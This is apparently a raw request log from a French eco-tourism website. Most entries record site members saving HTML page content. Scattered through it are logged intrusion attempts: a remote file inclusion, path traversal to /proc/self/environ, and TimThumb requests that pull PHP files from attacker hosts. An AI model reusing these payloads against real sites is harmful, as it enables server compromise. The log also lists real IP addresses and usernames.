2012-11-09 12:14:38 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:21:19 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;br /& PAR: cb_presentation2 2012-11-09 14:22:19 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:22:57 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:23:57 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:30:48 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:31:46 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:32:26 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:36:06 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:48:05 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-09 14:48:52 USER_AGENT: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 IP: 217.167.163.89 USER: domainedesbories REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-11-21 12:25:00 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0 IP: 88.175.105.165 USER: visionethique REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-11-22 11:46:06 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0 IP: 41.143.36.160 USER: TERRESETVOYAGES REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-11-22 18:31:27 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 89.83.55.248 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2012-11-22 18:32:24 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 89.83.55.248 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2012-11-28 14:23:49 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 AlexaToolbar/alxg-3.1 IP: 86.69.212.109 USER: AlterAsia REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3pxauto; display: block;\&quot; src=\&quot PAR: cb_presentation2 2012-11-28 14:41:09 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 AlexaToolbar/alxg-3.1 IP: 86.69.212.109 USER: AlterAsia REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3pxauto; display: block;\&quot; src=\&quot PAR: cb_presentation2 2012-11-28 14:45:54 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11 AlexaToolbar/alxg-3.1 IP: 86.69.212.109 USER: AlterAsia REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3pxauto; display: block;\&quot; src=\&quot PAR: cb_presentation2 2012-11-30 10:37:34 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11 AlexaToolbar/alxg-3.1 IP: 88.175.105.165 USER: AlterAsia REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3pxauto; display: block;\&quot; src=\&quot PAR: cb_presentation2 2012-12-02 21:58:12 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 IP: 2.11.189.195 USER: clegloanic REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-12-12 12:48:51 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11 IP: 79.85.57.103 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-12-12 14:11:39 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 92.103.57.251 USER: ericbonnard REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #0000ff;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-12-12 14:12:34 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 92.103.57.251 USER: ericbonnard REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;color: #0000ff;\&quot;&gt;&lt;strong&gt;&lt;img s PAR: cb_presentation2 2012-12-14 02:42:03 USER_AGENT: IP: 200.98.143.17 USER: visitor REQUEST: option=http://www.goodigood.com/mainfiles/inside.txt? PAR: /index.php?option=http://www.goodigood.com/mainfiles/inside.txt? 2012-12-21 03:55:47 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 208.131.138.16 USER: visitor REQUEST: page=login PAR: ?page=login&cmd=register 2012-12-23 23:20:29 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 81.56.56.162 USER: ecovoyageurs REQUEST: cb_engagements2=&lt;p style=\&quot;margin: 15px 0px; padding: 0px; border: 0px; font-family: Aria PAR: cb_engagements2 2012-12-23 23:25:11 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 81.56.56.162 USER: ecovoyageurs REQUEST: cb_engagements2=&lt;p style=\&quot;margin: 15px 0px; padding: 0px; border: 0px; font-family: Aria PAR: cb_engagements2 2012-12-23 23:27:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 81.56.56.162 USER: ecovoyageurs REQUEST: cb_engagements2=&lt;pre&gt;La raison d\'&Atilde;&ordf;tre d\'Ecovoyageurs.com est de progresser e PAR: cb_engagements2 2012-12-27 12:46:59 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 59.58.139.154 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2012-12-27 22:16:48 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 IP: 78.108.86.122 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 2012-12-27 22:16:48 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 IP: 78.108.86.122 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 2012-12-27 22:16:50 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 IP: 78.108.86.122 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 2012-12-28 17:32:57 USER_AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm) IP: 216.59.16.107 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-12-28 17:32:58 USER_AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm) IP: 216.59.16.107 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2012-12-28 17:32:58 USER_AGENT: Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm) IP: 216.59.16.107 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../..//proc/self/environ%00 2013-01-05 09:10:44 USER_AGENT: Manage your linux/unix boxes with one hand :) IP: 91.121.85.145 USER: visitor REQUEST: id=net.ssh.SSHControl PAR: https://play.google.com/store/apps/details?id=net.ssh.SSHControl 2013-01-05 10:41:17 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 82.241.249.204 USER: romain@enfantsdesandes.org REQUEST: cb_presentation2=&lt;pre&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;Voir le PAR: cb_presentation2 2013-01-06 11:16:25 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 88.173.180.108 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2013-01-06 11:16:38 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 88.173.180.108 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;span style=\&quot;color: #000000;\&quot PAR: t33 2013-01-06 18:47:04 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 82.241.249.204 USER: romain@enfantsdesandes.org REQUEST: cb_presentation2=&lt;pre&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;Voir le PAR: cb_presentation2 2013-01-06 18:49:23 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 82.241.249.204 USER: romain@enfantsdesandes.org REQUEST: cb_presentation2=&lt;pre&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;Voir le PAR: cb_presentation2 2013-01-07 08:54:26 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 82.241.249.204 USER: romain@enfantsdesandes.org REQUEST: cb_presentation2=&lt;pre&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;Voir le PAR: cb_presentation2 2013-01-07 09:00:51 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 82.241.249.204 USER: romain@enfantsdesandes.org REQUEST: cb_presentation2=&lt;pre&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;Voir le PAR: cb_presentation2 2013-01-07 09:01:41 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 IP: 82.241.249.204 USER: romain@enfantsdesandes.org REQUEST: cb_presentation2=&lt;pre&gt;&lt;span style=\&quot;color: #000000;\&quot;&gt;&lt;strong&gt;Voir le PAR: cb_presentation2 2013-01-07 11:19:00 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 88.175.105.165 USER: EloDurable REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-07 11:20:46 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 88.175.105.165 USER: EloDurable REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-07 11:22:51 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 88.175.105.165 USER: EloDurable REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-07 13:31:02 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 IP: 88.162.87.145 USER: bastina REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;&lt;img style=\&quot;display: block; margin-left: auto; m PAR: cb_presentation2 2013-01-07 13:44:07 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 IP: 88.162.87.145 USER: bastina REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;&lt;img style=\&quot;display: block; margin-left: auto; m PAR: cb_presentation2 2013-01-07 13:45:13 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 IP: 88.162.87.145 USER: bastina REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;&lt;img style=\&quot;display: block; margin-left: auto; m PAR: cb_presentation2 2013-01-07 13:47:42 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 IP: 88.162.87.145 USER: bastina REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;&lt;img style=\&quot;display: block; margin-left: auto; m PAR: cb_presentation2 2013-01-07 13:50:01 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 IP: 88.162.87.145 USER: bastina REQUEST: cb_presentation2=&lt;p&gt;&lt;strong&gt;&lt;img style=\&quot;display: block; margin-left: auto; m PAR: cb_presentation2 2013-01-08 15:35:22 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 83.205.54.198 USER: blue-ocean REQUEST: cb_engagements2=&lt;p&gt;&lt;span style=\&quot;color: #330000; font-family: Tahoma; font-size: 13 PAR: cb_engagements2 2013-01-12 19:03:59 USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 IP: 128.210.10.145 USER: visitor REQUEST: src=http://img.youtube.com.desahucia.com/inc.php PAR: /a-propos/notre-mission.html%22%20class=%22resultLink//wp-content/themes/thecotton/lib/utils/timthumb.php?src=http://img.youtube.com.desahucia.com/inc.php 2013-01-12 19:04:01 USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 IP: 128.210.10.145 USER: visitor REQUEST: src=http://img.youtube.com.desahucia.com/inc.php PAR: //wp-content/themes/thecotton/lib/utils/timthumb.php?src=http://img.youtube.com.desahucia.com/inc.php 2013-01-12 19:04:03 USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 IP: 128.210.10.145 USER: visitor REQUEST: src=http://img.youtube.com.desahucia.com/inc.php PAR: /a-propos//wp-content/themes/thecotton/lib/utils/timthumb.php?src=http://img.youtube.com.desahucia.com/inc.php 2013-01-12 19:36:21 USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 IP: 128.210.10.145 USER: visitor REQUEST: src=http://img.youtube.com.desahucia.com/inc.php PAR: /a-propos/notre-mission.html//wp-content/themes/thecotton/lib/utils/timthumb.php?src=http://img.youtube.com.desahucia.com/inc.php 2013-01-12 19:36:24 USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 IP: 128.210.10.145 USER: visitor REQUEST: src=http://img.youtube.com.desahucia.com/inc.php PAR: //wp-content/themes/thecotton/lib/utils/timthumb.php?src=http://img.youtube.com.desahucia.com/inc.php 2013-01-12 19:36:26 USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 IP: 128.210.10.145 USER: visitor REQUEST: src=http://img.youtube.com.desahucia.com/inc.php PAR: /a-propos//wp-content/themes/thecotton/lib/utils/timthumb.php?src=http://img.youtube.com.desahucia.com/inc.php 2013-01-15 04:55:10 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 199.119.204.18 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-01-17 12:15:04 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 IP: 88.175.105.165 USER: EloDurable REQUEST: data=&lt;p&gt;&lt;img src=\&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAMACAIAAAA12I PAR: data 2013-01-17 12:16:24 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 IP: 88.175.105.165 USER: EloDurable REQUEST: cb_engagements2=&lt;p&gt;&lt;span style=\&quot;font-size: 18pt;\&quot;&gt;&lt;img src=\&quot;data PAR: cb_engagements2 2013-01-17 12:27:35 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 41.74.210.212 USER: bohan REQUEST: cb_presentation2=&lt;p&gt;&lt;span style=\&quot;font-size: 14pt;\&quot;&gt;Activit&Atilde;&copy;s PAR: cb_presentation2 2013-01-17 12:58:28 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 41.74.210.212 USER: bohan REQUEST: cb_presentation2=&lt;p style=\&quot;margin-bottom: 0.0001pt; line-height: normal;\&quot;&gt;&lt;s PAR: cb_presentation2 2013-01-17 13:18:19 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0 IP: 88.175.105.165 USER: EloDurable REQUEST: cb_presentation2=&lt;p&gt;&lt;img src=\&quot;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASAAAA PAR: cb_presentation2 2013-01-17 15:44:41 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 178.211.40.151 USER: visitor REQUEST: src=http://blogger.com.izlicez.biz/byroe.php PAR: /a-propos//wp-content/themes/executive/tools/timthumb.php?src=http://blogger.com.izlicez.biz/byroe.php 2013-01-17 15:44:43 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 178.211.40.151 USER: visitor REQUEST: src=http://blogger.com.izlicez.biz/byroe.php PAR: //wp-content/themes/executive/tools/timthumb.php?src=http://blogger.com.izlicez.biz/byroe.php 2013-01-18 14:01:45 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 88.175.105.165 USER: visitor REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 5px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-18 14:02:01 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 88.175.105.165 USER: visitor REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 5px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-18 14:02:07 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11 IP: 88.175.105.165 USER: visitor REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 5px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-21 09:08:44 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 222.186.26.7 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-01-21 10:41:28 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 41.63.137.217 USER: bohan REQUEST: cb_engagements2=&lt;p style=\&quot;margin-bottom: 0.0001pt; line-height: normal;\&quot;&gt;&lt;st PAR: cb_engagements2 2013-01-21 10:48:42 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 IP: 41.63.137.217 USER: bohan REQUEST: cb_engagements2=&lt;p&gt;&lt;a href=\&quot;http://www.info-tourisme-madagascar.com/ITMN16.pdf\&qu PAR: cb_engagements2 2013-01-21 22:45:33 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 58.22.19.135 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-01-22 10:20:52 USER_AGENT: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0 IP: 175.42.45.130 USER: visitor REQUEST: page=login PAR: /?page=login&cmd=register 2013-01-22 11:42:59 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 80.14.33.180 USER: do2806 REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-22 11:44:43 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 80.14.33.180 USER: do2806 REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-22 11:47:06 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 80.14.33.180 USER: do2806 REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-23 11:31:37 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 88.175.105.165 USER: neocamino REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-23 11:32:45 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 88.175.105.165 USER: neocamino REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;margin: 3px; float: left;\&quot; src=\&quot;images PAR: cb_presentation2 2013-01-23 16:44:33 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 92.135.162.200 USER: agiron REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-23 16:54:07 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 92.135.162.200 USER: agiron REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-23 17:21:02 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 92.135.162.200 USER: agiron REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-23 17:33:44 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.52 Safari/537.17 IP: 92.135.162.200 USER: agiron REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2013-01-23 17:34:33 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) 